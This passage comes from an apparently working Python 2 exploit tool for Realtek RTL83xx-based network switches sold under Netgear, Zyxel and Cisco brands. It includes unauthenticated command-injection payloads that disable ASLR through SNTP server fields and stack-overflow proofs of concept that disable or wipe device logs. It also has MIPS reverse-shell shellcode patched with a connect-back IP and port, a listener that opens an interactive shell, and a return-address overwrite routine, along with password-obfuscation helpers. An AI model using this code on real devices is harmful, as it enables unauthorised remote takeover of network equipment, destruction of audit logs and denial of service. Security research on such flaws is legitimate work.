True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'cmd=547',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to 
jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > 
/proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\r\n\t\t}\r\n\r\n\t\tif self.ETag == 'report':\r\n\r\n\t\t\tsorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value\r\n\t\t\tfor targets in sorted_dict:\r\n\t\t\t\tself.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])\r\n\t\t\t\tself.source = Vendor_ETag[targets]\r\n\t\t\t\tself.dict_merge(self.target,self.source)\r\n\t\t\t\tprint \"\"\r\n\r\n\t\t\t\ttmp = \"] {} {} v{} 
[\".format(self.target['vendor'],self.target['model'],self.target['version'])\r\n\t\t\t\tprint \"[{:=^78}]\".format(tmp)\r\n\r\n\t\t\t\tprint self.target['uri']\r\n\r\n\t\t\t\tprint \"\" # make it nicer to read\r\n\r\n\t\t\t\tLEN = len(self.target['exploit'])\r\n\t\t\t\tfor exploits in self.target['exploit']:\r\n\t\t\t\t\tif not self.target['exploit'][exploits]['vulnerable']:\r\n\t\t\t\t\t\tLEN = LEN - 1\r\n\r\n\t\t\t\ttmp = \"] {}({}) [\".format(\"Exploits \",LEN)\r\n\t\t\t\tprint \"[{:-^78}]\".format(tmp)\r\n\r\n\t\t\t\tfor exploits in self.target['exploit']:\r\n\t\t\t\t\ttmp = self.target['exploit'][exploits]\r\n\t\t\t\t\tif self.target['exploit'][exploits]['vulnerable']:\r\n\t\t\t\t\t\tlog.success(\"{:.<54}[Authenticated: {}]\\n{}\\n\".format(exploits, tmp['authenticated'] ,tmp['description']))\r\n\r\n\t\t\t\tprint \"\" # make it nicer to read\r\n\r\n\t\t\t\ttmp = \"] {}({}) [\".format(\"Verification \",len(self.target['verify']))\r\n\t\t\t\tprint \"[{:-^78}]\".format(tmp)\r\n\r\n\t\t\t\tfor verification in self.target['verify']:\r\n\t\t\t\t\ttmp = self.target['verify'][verification]\r\n\t\t\t\t\tlog.success(\"{:.<54}[Authenticated: {}]\\n{}\\n\".format(verification, tmp['authenticated'] ,tmp['description']))\r\n\r\n\r\n\t\t\t\tprint \"\"\r\n\t\t\treturn False\r\n\t\telif self.ETag == 'help':\r\n\t\t\tsorted_dict = OrderedDict(sorted(Vendor_ETag.items(), key=lambda t: t[1])) # sorted by ETag value\r\n\t\t\tfor targets in sorted_dict:\r\n\t\t\t\tself.target = copy.deepcopy(Vendor_Template[Vendor_ETag[targets]['template']])\r\n\t\t\t\tself.source = Vendor_ETag[targets]\r\n\t\t\t\tself.dict_merge(self.target,self.source)\r\n\t\t\t\tlog.info(\"ETag: {:<11} [{} {} v{}]\".format(targets, self.target['vendor'],self.target['model'],self.target['version']))\r\n\t\t\tprint \"\"\r\n\t\t\treturn False\r\n\r\n\r\n\t\tfor check in Vendor_ETag.keys():\r\n\t\t\tif check == self.ETag:\r\n\t\t\t\tself.target = 
copy.deepcopy(Vendor_Template[Vendor_ETag[check]['template']])
				self.source = Vendor_ETag[check]

				# Overlay the per-ETag entry onto a deep copy of its vendor template
				self.dict_merge(self.target,self.source)
				return self.target

		# No entry in Vendor_ETag matched self.ETag
		return False


#
# Driver/helper class for the RTL83xx-based switch PoCs in this file.
# Holds the connection parameters given by the caller plus the encoding and
# obfuscation helpers the individual exploit/verify methods rely on.
#
class RTK_RTL83xx:

	#
	# rhost, proto, verbose, creds, Raw: target/connection parameters, stored as-is
	#   ('creds' is kept as self.credentials, 'Raw' as self.Raw).
	# lhost, lport: connect-back address used by shellcode() and the listeners.
	# self.event: checked by heack_hydra_shell() after its listener accepts; when
	#   it is set the accepted connection is treated as an internal "quit"
	#   connection rather than one from the target.
	# self.headers: base HTTP headers reused by the request helpers.
	#
	def __init__(self, rhost, proto, verbose, creds, Raw, lhost, lport):
		self.rhost = rhost
		self.proto = proto
		self.verbose = verbose
		self.credentials = creds
		self.Raw = Raw
		self.lhost = lhost
		self.lport = lport

		self.event = threading.Event()

		self.headers = {
			'Host':rhost,
			'User-Agent':'Chrome'
			}

	#
	# Workaround for Planet Tech. and others as it will always be logged in at my LAB
	#
	# Requests /cgi-bin/dispatcher.cgi?cmd=3 (the 'logout_uri' used in the target
	# tables above) and always returns True, even when the request raises.
	#
	# NOTE(review): rhost, proto, verbose, creds and raw_request are read as bare
	# names here rather than self.rhost / self.proto / self.verbose /
	# self.credentials / self.Raw, so this only works when module-level globals
	# of those names exist. 'response' and 'e' are unused, and the 'pass' after
	# 'return True' is unreachable.
	#
	def Workaround_logout(self):
		try:
			URI = '/cgi-bin/dispatcher.cgi?cmd=3'
			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) 
			return True
		except Exception as e:
			return True
			pass

	#
	# Very rare I have seen garbage returned with JSON data
	# make sure to clean out potential garbage, so we can load JSON with json.loads()
	#
	# Keeps only the characters from the first '{' up to the '}' that brings the
	# brace depth back to zero (and any later brace group); everything outside
	# such groups is dropped. This is a plain character scan, not a JSON parser,
	# so a '{' or '}' inside a JSON string value is counted as well.
	#
	def clean_json(self, text):
		self.text = text

		start = 0	# current brace depth, not an index
		result = ''

		for check in range(0,len(self.text)):
			if self.text[check] == '{':
				result += self.text[check]
				start = start + 1
			elif start:
				result += self.text[check]
				if self.text[check] == '}':
					start = start - 1

		return result

	#
	# Small function to return N in random chars
	#
	# Despite the name this returns 'A' repeated 'length' times; the random
	# variant is the commented-out line below. Used for the padding lengths in
	# the 'content' entries of the target tables above.
	#
	def random_string(self,length):
		self.length = length

		return 'A' * self.length
		#return ''.join(random.choice(string.lowercase) for i in range(self.length))

	#
	# Hex MD5 digest of 'string'; base64-encoded when 'base64encode' is truthy
	# (note it is the hex text that gets base64-encoded, not the raw digest).
	# Python 2 semantics: hashlib.md5() is handed a str directly, as elsewhere
	# in this file (xrange, string.atol, string.join).
	#
	def md5hash(self, string, base64encode):
		self.string = string
		self.base64encode = base64encode

		hash_object = hashlib.md5(self.string)
		md5_hash = hash_object.hexdigest()

		if self.base64encode:
			return base64.b64encode(md5_hash)	# Why...
		else:
			return md5_hash

	#
	# Per-character transform chr(32 + ord(c) % 95); output stays within the
	# printable range 32..126.
	#
	def caesar_encode(self, string):
		self.string = string

		return ''.join(chr(32 + int(ord(self.string[char])) % 95) for char in range(0,len(self.string)))

	#
	# Inverse of caesar_encode() only for code points below 95: '%' binds tighter
	# than '-', so 'ord(c) - 32 % 95' is evaluated as 'ord(c) - (32 % 95)', i.e. a
	# plain shift down by 32 and the modulus has no effect.
	# NOTE(review): presumably mirrors the device's own transform — confirm
	# against the firmware before changing the precedence.
	#
	def caesar_decode(self, string):
		self.string = string

		return ''.join(chr(int(ord(self.string[char])) - 32 % 95) for char in range(0,len(self.string)))

	#
	# Obfuscation
	# 
	# Functionality:
	# Reversed password string, split each character 7 bytes apart, split and put size of password at two fixed locations in the string,
	# then fill the rest with random garbage to look like advanced and unknown encryption
	#
	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
	#
	# Layout of the returned string (index = i - 1 for loop counter i):
	#   - password characters, last one first, at indices 6, 13, 20, ... (i % 7 == 0)
	#   - tens digit of the password length at index 122, units digit at index 288
	#   - every other slot is a character drawn from 'possible' via randint(),
	#     so the output is not deterministic
	# Length is PASS_LEN - 1: 320 characters for passwords of up to 44 characters,
	# otherwise 7 * len(password) + 6. The password is truncated to 99 characters.
	#
	def obfuscation_encode(self, password):
		self.password = password

		text = ''
		possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'

		# Max 99 char in password
		self.password = self.password[:99]

		inlen = len(self.password)	# characters still to place (counts down)
		inlenn = len(self.password)	# original length, written at 122/288

		# len((password) * 7) is the length of the 7x repeated string, i.e. 7 * len(password)
		if (len((self.password) * 7) + 7) <= 320:
			PASS_LEN = 321 # string needs to be 320 bytes as minimum
		else:
			PASS_LEN = (len((self.password) * 7) + 7)

		for i in xrange(1, PASS_LEN ,1):
			if (0 == i % 7 and inlen > 0):
				text += self.password[inlen-1]
				inlen = inlen - 1
			elif (i == 123):
				if inlenn < 10:
					text += '0'
				else:
					text += str(int(math.floor(inlenn / 10)))
			elif (i == 289):
				text += str(inlenn % 10)
			else:
				#text += '_'	# debug
				text += possible[int(math.floor(randint(0, len(possible)-1)))] # random garbage

		return text

	#
	# Obfuscation
	#
	# Netgear: GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP
	# Zyxel: GS1900-24-2.40_AAHL.1_20180705
	#
	# Reverse of obfuscation_encode(): reads the length digits at indices 122 and
	# 288, collects the characters at indices 6, 13, 20, ... until that many have
	# been gathered, then reverses them. Inputs shorter than 289 characters (but
	# long enough to reach i == 7) raise IndexError when the digits are read.
	#
	def obfuscation_decode(self, password):
		self.password = password

		text = ''
		for i in range(1, len(self.password) ):
			if (0 == i % 7):
				if len(text) == (int(self.password[122]) * 10) + int(self.password[288]):
					break
				text += self.password[i-1]
		text = text[::-1] # reverse string
		return text

	#
	# Appends '&hash=<hex md5 of the query string after the first "?">' to a URI.
	# Raises IndexError when the URI contains no '?'.
	#
	def netgear_hash(self, URI):
		self.URI = URI

		return '&hash=' + self.md5hash(URI.split("?")[1],False)

	#
	# PKCS#1 v1.5 RSA encryption of 'text' under the public key (modulus, exponent).
	# The second parameter is the public exponent despite its name; the only
	# caller passes 0x10001. RSA and PKCS1_v1_5 come from an import outside this
	# excerpt (presumably PyCrypto/PyCryptodome — confirm).
	#
	def _encrypt_RSA(self, modulus, passphrase, text):
		key = RSA.construct((modulus, passphrase))
		cipher = PKCS1_v1_5.new(key)
		ciphertext = cipher.encrypt(text)
 
		return ciphertext
 
	#
	# Encrypts 'password' for the device: modulus parsed from its hex string via
	# string.atol (Python 2 only), exponent 65537, ciphertext returned base64-encoded.
	#
	def RSA_encrypt_params(self, cisco_modulus, password):
		self.cisco_modulus = cisco_modulus
		self.password = password

		encrypted_passphrase = self._encrypt_RSA(string.atol(self.cisco_modulus, 16),
												 string.atol("10001", 16),
												 self.password)
		return base64.b64encode(encrypted_passphrase)

	#
	# Fetches the device's RSA modulus from target['modulus_uri'] (JSON key
	# data.modulus) and returns the URL-encoded, base64 RSA ciphertext of
	# 'string'. When data.modulus is empty/falsy the plaintext is returned unchanged.
	#
	# NOTE(review): 'target', 'rhost', 'proto', 'verbose', 'creds', 'raw_request'
	# and 'headers' are module-level names here, not self.* — same issue as in
	# Workaround_logout(). The parameter name 'string' shadows the 'string'
	# module inside this method (harmless here, as the module is not used in it).
	#
	def RSA_Password(self, string):
		self.string = string

		URI = target['modulus_uri']
		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)
		result = json.loads(response.read())

		if result['data']['modulus']:
			cipher = self.RSA_encrypt_params(result['data']['modulus'], str(self.string))
		else:
			return self.string

		return urllib.quote_plus(cipher)

	#
	# True when the target table has a truthy 'xsid' entry, False otherwise.
	#
	def check_XSID(self, target):
		self.target = target

		if self.target['xsid']:
			return True
		else:
			return False

	#
	# Fetches target['xsid_uri'] as JSON and returns data.xsid, RSA-encrypted via
	# RSA_encrypt_params() when data.modulus is present. Uses the same module-level
	# names (rhost, proto, verbose, creds, raw_request, headers) as RSA_Password().
	#
	def Cisco_XSID(self,target):
		self.target = target

		URI = 
target['xsid_uri']\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None,False)\r\n\t\tresult = json.loads(response.read())\r\n\r\n\t\tif result['data']['modulus']:\r\n\t\t\tcipher = self.RSA_encrypt_params(result['data']['modulus'],str(result['data']['xsid']))\r\n\t\t\treturn cipher\r\n\t\telse:\r\n\t\t\treturn result['data']['xsid']\r\n\r\n\tdef shellcode(self):\r\n\r\n\t\t#\r\n\t\t# Reverse shell\r\n\t\t#\r\n\t\t# SRC: https://www.exploit-db.com/exploits/45541\r\n\t\t#\r\n\t\tMIPSeb = string.join([\r\n\t\t\t\"\\x24\\x0f\\xff\\xfa\"\t# li\t$t7, -6\r\n\t\t\t\"\\x01\\xe0\\x78\\x27\"\t# nor $t7, $zero\r\n\t\t\t\"\\x21\\xe4\\xff\\xfd\"\t# addi $a0, $t7, -3\r\n\t\t\t\"\\x21\\xe5\\xff\\xfd\"\t# addi $a1, $t7, -3\r\n\t\t\t\"\\x28\\x06\\xff\\xff\"\t# slti $a2, $zero, -1\r\n\t\t\t\"\\x24\\x02\\x10\\x57\"\t# li\t$v0, 4183 ( sys_socket )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\xaf\\xa2\\xff\\xff\"\t# sw\t$v0, -1($sp)\r\n\t\t\t\"\\x8f\\xa4\\xff\\xff\"\t# lw\t$a0, -1($sp)\r\n\t\t\t\"\\x34\\x0f\\xff\\xfd\"\t# li\t$t7, -3 ( sa_family = AF_INET )\r\n\t\t\t\"\\x01\\xe0\\x78\\x27\"\t# nor $t7, $zero\r\n\t\t\t\"\\xaf\\xaf\\xff\\xe0\"\t# sw\t$t7, -0x20($sp)\r\n\t\t\t# ================ You can change port here =================\r\n\t\t\t\"\\x3c\\x0ePP0PP1\"\t# lui $t6, 0x115c ( sin_port = 0x115c ) # 4444\r\n\t\t\t# ============================================================\r\n\t\t\t\"\\x35\\xce\\x7a\\x69\"\t# ori $t6, $t6, 0x7a69 \r\n\t\t\t\"\\xaf\\xae\\xff\\xe4\"\t# sw\t$t6, -0x1c($sp)\r\n\t\t\t# ================ You can change ip here =================\r\n\t\t\t\"\\x3c\\x0eIP1IP2\"\t# lui $t6, 0xc0a8\t ( sin_addr = 0xc0a8 ... # 192 168\r\n\t\t\t\"\\x35\\xceIP3IP4\"\t# ori $t6, $t6, 0x029d ... 
0x3901 # 57 1\r\n\t\t\t# ============================================================\r\n\t\t\t\"\\xaf\\xae\\xff\\xe6\"\t# sw\t$t6, -0x1a($sp)\r\n\t\t\t\"\\x27\\xa5\\xff\\xe2\"\t# addiu $a1, $sp, -0x1e\r\n\t\t\t\"\\x24\\x0c\\xff\\xef\"\t# li\t$t4, -17 ( addrlen = 16 )\r\n\t\t\t\"\\x01\\x80\\x30\\x27\"\t# nor $a2, $t4, $zero\r\n\t\t\t\"\\x24\\x02\\x10\\x4a\"\t# li\t$v0, 4170 ( sys_connect )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x24\\x0f\\xff\\xfd\"\t# li\tt7,-3\r\n\t\t\t\"\\x01\\xe0\\x28\\x27\"\t# nor a1,t7,zero\r\n\t\t\t\"\\x8f\\xa4\\xff\\xff\"\t# lw\t$a0, -1($sp) \r\n\t\t\t# dup2_loop:\r\n\t\t\t\"\\x24\\x02\\x0f\\xdf\"\t# li\t$v0, 4063 ( sys_dup2 )\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x24\\xa5\\xff\\xff\"\t# addi a1,a1,-1 (\\x20\\xa5\\xff\\xff)\r\n\t\t\t\"\\x24\\x01\\xff\\xff\"\t# li\tat,-1\r\n\t\t\t\"\\x14\\xa1\\xff\\xfb\"\t# bne a1,at, dup2_loop\r\n\t\t\t\"\\x28\\x06\\xff\\xff\"\t# slti $a2, $zero, -1\r\n\t\t\t\"\\x3c\\x0f\\x2f\\x2f\"\t# lui $t7, 0x2f2f (//)\r\n\t\t\t\"\\x35\\xef\\x62\\x69\"\t# ori $t7, $t7, 0x6269 (bi)\r\n\t\t\t\"\\xaf\\xaf\\xff\\xec\"\t# sw\t$t7, -0x14($sp)\r\n\t\t\t\"\\x3c\\x0e\\x6e\\x2f\"\t# lui $t6, 0x6e2f (n/)\r\n\t\t\t\"\\x35\\xce\\x73\\x68\"\t# ori $t6, $t6, 0x7368 (sh) \r\n\t\t\t\"\\xaf\\xae\\xff\\xf0\"\t# sw\t$t6, -0x10($sp)\r\n\t\t\t\"\\xaf\\xa0\\xff\\xf4\"\t# sw\t$zero, -0xc($sp)\r\n\t\t\t\"\\x27\\xa4\\xff\\xec\"\t# addiu $a0, $sp, -0x14\r\n\t\t\t\"\\xaf\\xa4\\xff\\xf8\"\t# sw\t$a0, -8($sp)\r\n\t\t\t\"\\xaf\\xa0\\xff\\xfc\"\t# sw\t$zero, -4($sp)\r\n\t\t\t\"\\x27\\xa5\\xff\\xf8\"\t# addiu $a1, $sp, -8\r\n\t\t\t\"\\x24\\x02\\x0f\\xab\"\t# li\t$v0, 4011 (sys_execve)\r\n\t\t\t\"\\x01\\x01\\x01\\x0c\"\t# syscall 0x40404\r\n\t\t\t\"\\x8f\\x84\\x80\\x18\"\t# Variant of NOP\r\n\t\t\t], '')\t\r\n\r\n\r\n\t\t# Connect back IP\r\n\t\tip_hex = '{:02x} {:02x} {:02x} {:02x}'.format(*map(int, self.lhost.split('.')))\r\n\t\tip_hex = 
ip_hex.split()\r\n\t\tIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n\r\n\t\t# Let's break apart the hex code of LPORT into two bytes\r\n\t\tport_hex = hex(int(self.lport))[2:]\r\n\t\tport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n\t\tport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n\t\tport_hex = port_hex.split()\r\n\t\tif len(port_hex) == 1:\r\n\t\t\tport_hex = ('00' + ' ' + ''.join(port_hex)).split()\r\n\r\n\t\t#\r\n\t\t# Replace IP and PORT in shellcode\r\n\t\t#\r\n\t\tMIPSeb = MIPSeb.replace('PP0',chr(int(port_hex[0],16)))\r\n\t\tMIPSeb = MIPSeb.replace('PP1',chr(int(port_hex[1],16)))\r\n\r\n\t\tMIPSeb = MIPSeb.replace('IP1',chr(int(IP1,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP2',chr(int(IP2,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP3',chr(int(IP3,16)))\r\n\t\tMIPSeb = MIPSeb.replace('IP4',chr(int(IP4,16)))\r\n\r\n\t\treturn MIPSeb\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\t# Start thread for exploting, create a listener on LPORT, wait for connection and stop the exploit thread when remote connected\r\n\t#\r\n\t# Note:\r\n\t# The vulnerability are _not_ from Boa nor Hydra, coming from Realtek coding.\r\n\t# The device should be newly restarted and/or not been accessed with http/https, so the heap is relative untouched.\r\n\t#\r\n\t# This code will:\r\n\t# 1. Trigger stack overflow in boa/Hydra web server [ extractVmlinuxImage(), getFdStr() ]\r\n\t# 2. Overwrite first byte in provided RA with 0x00, so we can jump within the binary\r\n\t# 3. Jump to our gadget\r\n\t# 4. Jump to NOP sled and shellcode on heap\r\n\t# 5. Launch forked() reverse shell\r\n\t# 6. 
Try restart Boa/Hydra (to mitigate DoS)\r\n\t#\r\n\t# Success: Reverse shell and restarted Boa/Hydra\r\n\t# Failure: No reverse shell and crashed Boa/Hydra (DoS)\r\n\t#\r\n\tdef heack_hydra_shell(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['heack_hydra_shell']['vulnerable']:\r\n\t\t\tlog.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\t# Connect-timeout in seconds\r\n\t\ttimeout = 20\r\n\t\tsocket.setdefaulttimeout(timeout)\r\n\r\n\t\tthread.start_new_thread(self.heack_hydra_exploit,(\"heack_hydra_exploit\",self.target,))\r\n\r\n\t\tlsock = listen(port=self.lport)\r\n\t\tc = lsock.wait_for_connection()\r\n\t\tif not self.event.is_set():\r\n\t\t\tc.interactive(prompt = '# ')\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.failure(\"Got internal connection to quit\")\r\n\t\t\tc.close()\r\n\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef heack_hydra_exploit(self, threadName, target):\r\n\t\tself.threadName = threadName\r\n\t\tself.target = target\r\n\t\tCRLF_NOP = 0x24060d0a # NOP w/ CRLF (li $a2, 0x00000D0A)\r\n\t\tNOP = 0x2406ffff\t# NOP (li $a2, 0xFFFFFFFF)\r\n\t\tJUMP = 0x04110111 # bal +273\r\n\r\n\t\t# Debug\r\n\t\t#CRLF_NOP = 0x4c460d0a # LF\\r\\n\r\n\t\t#NOP = 0x6e6f6f70 # noop\r\n\t\t#JUMP = 0x4a4d5044 # JMPD\r\n\t\t#MIPSeb = (\"\\x43\\x4f\\x44\\x45\" * 45) + \"\\x4e\\x4f\\x4f\\x50\" # CODE + NOOP = 148 bytes\r\n\r\n\t\tquery_args = ''\r\n\r\n\t\t#\r\n\t\t# This will overwrite RA:\r\n\t\t#\r\n\t\t\r\n\t\t#\r\n\t\t# NETGEAR: 'getFdStr()' modified, this is weird 'solution' to have $t9 loaded with JMP in 'fwrite()'\r\n\t\t#\r\n\t\tif self.target.get('hash_uri'): # NETGEAR Inc. 
(GS728TPv2, GS728TPPv2, GS752TPv2, GS752TPP)\r\n\t\t\tquery_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'])) * 76 # direct heap address\r\n\t\telse:\r\n\t\t\tquery_args += (struct.pack('>L',NOP) * 73) + struct.pack('>L',JUMP) + struct.pack('>L',NOP) # 300 bytes + RA below\r\n\r\n\t\t#\r\n\t\t# Return address to where we want jump (0x58 will be overwritten with 0x00 below)\r\n\t\tquery_args += struct.pack('>L',(self.target['exploit']['heack_hydra_shell']['gadget'] + 0x58000000)) # 0x58xxxxxx\r\n\r\n\t\t#\r\n\t\t# Space between new RA and overwrite with 0x00 (Range: 1 => 3)\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * 2\r\n\r\n\t\t# CRLF_NOP will overwrite '0x58' in above RA address with 0x00, as the code will always terminate CRLF with 0x00\r\n\t\t#\r\n\t\t# 7FF4BE60 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 noopnoopnoopnoop\r\n\t\t# 7FF4BE70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 6E 6F 6F 70 noopnoopnoopnoop\r\n\t\t# 7FF4BE80 6E 6F 6F 70 6E 6F 6F 70 4C 46 0D 0A 00 40 FF AC [email\u00a0protected] <=== 'X' overwritten with 0x00\r\n\t\t#\r\n\t\tquery_args += (struct.pack('>L',NOP) * 74) + struct.pack('>L',CRLF_NOP) # 300 bytes + 0x00\r\n\r\n\t\t#\r\n\t\t# $v0 = tmpHeaderSize\r\n\t\t# $gp = pointing to heap\r\n\t\t#\r\n\t\t# Gadget:\r\n\t\t# addu $v0,\t$g0 # The addition of $v0 and $g0 points to our heap NOP sled\r\n\t\t# jr\t$v0 \t# Its lovely when [heap] are rwxp :>\r\n\t\t#\r\n\t\t# This adjusting $v0 value (Range: 4 => 9)\r\n\t\t#\r\n\t\tquery_args += ((struct.pack('>L',NOP) * 63) + struct.pack('>L',CRLF_NOP)) * self.target['exploit']['heack_hydra_shell']['v0']\r\n\r\n\t\t#\r\n\t\t# fork() reverse shell to get new PID, and jump over child\r\n\t\t#\r\n\t\tquery_args += struct.pack('>L',0x24020fa2) # li $v0, 4002 ( fork )\r\n\t\tquery_args += struct.pack('>L',0x0101010c) # syscall unk_40404\r\n\t\tquery_args += struct.pack('>L',0x1c400101) # bgtz $v0, +257 ( Jump over child to restart 
